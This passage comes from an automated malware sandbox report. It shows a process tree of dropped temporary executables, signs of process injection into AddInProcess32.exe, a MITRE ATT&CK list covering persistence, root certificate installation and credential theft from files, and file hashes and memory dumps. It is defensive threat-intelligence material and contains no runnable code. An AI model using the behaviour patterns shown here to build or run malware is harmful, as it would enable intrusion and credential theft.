                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                PID:6000
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3752.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3752.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                PID:6444
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3E39.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3E39.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                PID:6596
                                                                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:5596
                                                                                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:5440
                                                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:5500
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4B4A.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\4B4A.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      PID:6612
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6612 -s 272
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                        PID:6272
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5184.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\5184.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      PID:6880
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:2080
                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:7156
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:936
                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                            PID:6560
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:6052
                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                              PID:6204
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:3304
                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                PID:4072
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:6964
                                                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:5708
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:5904
                                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:5296
                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                        PID:2380

                                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                      T1060

                                                                                                                                                                                                                                                                                      BITS Jobs

                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                      T1197

                                                                                                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                      T1112

                                                                                                                                                                                                                                                                                      BITS Jobs

                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                      T1197

                                                                                                                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                      T1130

                                                                                                                                                                                                                                                                                      Credential Access

                                                                                                                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                      T1081

                                                                                                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                                                                                                      Software Discovery

                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                      T1518

                                                                                                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                                                                                                      5
                                                                                                                                                                                                                                                                                      T1012

                                                                                                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                                                                                                      6
                                                                                                                                                                                                                                                                                      T1082

                                                                                                                                                                                                                                                                                      Security Software Discovery

                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                      T1063

                                                                                                                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                      T1120

                                                                                                                                                                                                                                                                                      Remote System Discovery

                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                      T1018

                                                                                                                                                                                                                                                                                      Collection

                                                                                                                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                                                                                                                      3
                                                                                                                                                                                                                                                                                      T1005

                                                                                                                                                                                                                                                                                      Command and Control

                                                                                                                                                                                                                                                                                      Web Service

                                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                                      T1102

                                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        581316219db9ee18e4da62b6114fb8c6

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        256c729df3d2436a393fd91d7e854287b345e5d6

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        c9af52bb5009c12299dd0b2ce2b7c75da53d751d55f11b79fc4f43c725fe11a5

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        16e117fc321af0380a4696592b8aa79093db7f294648e5086b52cf202937fe851e53db400a95dfbd0e8a19ae3f91b78bb997464dc59055481e4cbe7a6f61e28a

                                                                                                                                                                                                                                                                                      • \??\pipe\crashpad_4600_IGAGECCFDAWOZARI
                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                      • \??\pipe\crashpad_4800_QLPQXPZINTIXDZAS
                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                      • memory/68-257-0x000001538CF40000-0x000001538CFB0000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                      • memory/492-265-0x000002449EB50000-0x000002449EBC0000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                      • memory/500-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/508-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/736-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/748-285-0x000001D07FC00000-0x000001D07FCFF000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        1020KB

                                                                                                                                                                                                                                                                                      • memory/748-255-0x000001D07D770000-0x000001D07D7E0000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                      • memory/800-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/1064-263-0x000001C9E5CB0000-0x000001C9E5D20000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                      • memory/1080-137-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/1152-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/1156-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/1188-272-0x0000016ABBB60000-0x0000016ABBBD0000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                      • memory/1216-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/1276-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/1280-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/1344-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/1348-274-0x000001ECA7760000-0x000001ECA77D0000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                      • memory/1404-267-0x0000023008710000-0x0000023008780000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                      • memory/1416-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/1500-213-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/1528-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/1852-177-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/1908-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/1952-270-0x000001EF56680000-0x000001EF566F0000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                      • memory/1988-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/2040-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/2132-203-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/2200-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/2204-287-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/2220-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/2260-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/2352-155-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/2368-283-0x0000000000400000-0x0000000000459000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        356KB

                                                                                                                                                                                                                                                                                      • memory/2376-198-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/2512-261-0x000002D49CC60000-0x000002D49CCD0000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                      • memory/2520-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/2528-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/2532-259-0x000001CB8D8A0000-0x000001CB8D910000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                      • memory/2560-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/2704-253-0x0000020358B70000-0x0000020358BE0000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                      • memory/2760-286-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        88KB

                                                                                                                                                                                                                                                                                      • memory/2788-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/2792-293-0x0000000000BD2000-0x0000000000BD4000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                                      • memory/2792-295-0x0000000000BD5000-0x0000000000BD6000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/2792-290-0x0000000000BD0000-0x0000000000BD2000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                                      • memory/2796-275-0x000001F588210000-0x000001F588280000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                      • memory/2796-247-0x000001F587A70000-0x000001F587ABB000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        300KB

                                                                                                                                                                                                                                                                                      • memory/2812-276-0x000001CCD1970000-0x000001CCD19E0000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                      • memory/2868-284-0x00000000010B0000-0x00000000010B2000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                                      • memory/3092-222-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/3188-220-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/3200-192-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/3200-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/3228-289-0x0000000002BC0000-0x0000000002BC2000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                                      • memory/3228-291-0x0000000002BC2000-0x0000000002BC4000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                                      • memory/3228-292-0x0000000002BC4000-0x0000000002BC5000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/3228-294-0x0000000002BC5000-0x0000000002BC7000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                                      • memory/3372-210-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/3480-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/3516-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/3732-288-0x0000000002FF0000-0x0000000002FF2000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                                      • memory/3884-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/3972-208-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/4104-187-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/4176-130-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/4280-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/4280-123-0x00007FFDAE110000-0x00007FFDAE111000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/4332-300-0x0000000003340000-0x0000000003388000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        288KB

                                                                                                                                                                                                                                                                                      • memory/4492-183-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/4564-202-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/4588-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/4600-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/4636-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/4660-245-0x0000000002890000-0x0000000002A2C000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        1.6MB

                                                                                                                                                                                                                                                                                      • memory/4664-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/4736-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/4816-298-0x0000000003DD0000-0x0000000003F1A000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        1.3MB

                                                                                                                                                                                                                                                                                      • memory/4860-251-0x00000217CFA70000-0x00000217CFAE0000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                      • memory/4860-308-0x00000217CFB50000-0x00000217CFBC0000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        448KB

                                                                                                                                                                                                                                                                                      • memory/4860-304-0x00000217CFA00000-0x00000217CFA4B000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        300KB

                                                                                                                                                                                                                                                                                      • memory/4928-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/5044-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/5128-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/5140-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/5144-249-0x0000000000B50000-0x0000000000BAC000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        368KB

                                                                                                                                                                                                                                                                                      • memory/5144-246-0x00000000007BD000-0x00000000008BE000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        1.0MB

                                                                                                                                                                                                                                                                                      • memory/5200-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/5236-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/5240-269-0x000000001CEF0000-0x000000001CEF2000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                                      • memory/5276-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/5288-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/5400-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/5548-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/5612-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/5628-299-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        284KB

                                                                                                                                                                                                                                                                                      • memory/5632-296-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                                                                                      • memory/5632-297-0x00000000005A0000-0x00000000005B2000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        72KB

                                                                                                                                                                                                                                                                                      • memory/5728-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/5768-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/5772-282-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                      • memory/5800-277-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        172KB

                                                                                                                                                                                                                                                                                      • memory/5808-280-0x0000000010000000-0x0000000011157000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        17.3MB

                                                                                                                                                                                                                                                                                      • memory/5808-279-0x0000000004160000-0x0000000005262000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        17.0MB

                                                                                                                                                                                                                                                                                      • memory/5820-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/5828-281-0x0000000004260000-0x00000000042F1000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        580KB

                                                                                                                                                                                                                                                                                      • memory/5828-278-0x0000000000400000-0x0000000003DF0000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        57.9MB

                                                                                                                                                                                                                                                                                      • memory/5828-301-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        3.5MB

                                                                                                                                                                                                                                                                                      • memory/5868-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/5936-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/5984-244-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                      • memory/6000-302-0x00000000041A2000-0x00000000042A3000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        1.0MB

                                                                                                                                                                                                                                                                                      • memory/6000-303-0x00000000043E0000-0x000000000443C000-memory.dmp
                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        368KB